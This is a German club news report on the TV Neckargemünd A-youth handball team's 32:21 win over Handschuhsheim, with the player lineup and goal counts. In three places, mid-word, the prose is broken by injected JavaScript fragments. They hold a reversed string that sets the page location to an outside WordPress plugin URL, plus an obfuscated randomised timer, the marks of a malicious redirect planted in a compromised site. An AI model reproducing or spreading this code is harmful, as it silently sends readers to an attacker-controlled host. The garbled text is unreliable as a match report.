A-Jugend: der Aufschwung geht weiter

Schade, dass die Saison bald vorbei ist. In den letzten Spielen kann die A-Jugend des TV Neckargemünd nun ihr volles Potential auf die Platte bringen. Auch gegen Handschuhsheim gab es im letzten Spiel wieder einen überzeugenden Sieg mit 32:21. Die Mannschaft wollte sich wohl für das relativ schwache Spiel im Hinspiel revanchieren. Das ist auch eindrucksvoll gelungen.
Neckargemünd, den 19.03.17 (bsc)- 
Die ersten 10 Minuten waren noch ziemlich ausgeglichen, aber dann wurden in Abwehr, eine ganz neue Qualität der Jungs, Bälle erobert und im Tempo Gegenstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toss in Tore umgesetzt. Nach 21 Minuten nahm Alex eine Auszeit beim Stand von 14.8. Das war schon eine Ansage.

Das Spiel hat die Mannschaft einfach mit grosser Souveränität in der zweiten Halbzeit durchgezogen, ohne grosse Schwächen wie in der Vorrunde. Der 5 Tore Tore Vorsprung wurde bis zur 50. Minute gehalten. Dann bekam der beste Spieler der Handschuhsheimer die dritte 2 Minuten Strafe und somit die rote Karte. Unsere Mannschaft hat das dann super umgesetzt und durch 6 Tore in der Schlussphase das toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle Endergebnis eingefahren.

Die Mannschaft konnte in voller Besetzung antreten. Leider war Niklas verletzt. Dafür konnte der B-Jugend Torwart Marvin sein Debüt geben.

Wie immer in jedem Spiel konnten sich fast alle Spieler in die Torschützenliste eintragen, oder hatten Chancen, eine ganz toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolle Qualität diese Teams.

Es spielten: Tobias und Marvin im Tor, Jordi (3), Till (6), Emil (5), Sebastian (4), Felix (4), Nicolas (3), Johannes, Philipp, Samuel (1), Timothy (4), Hauke (2)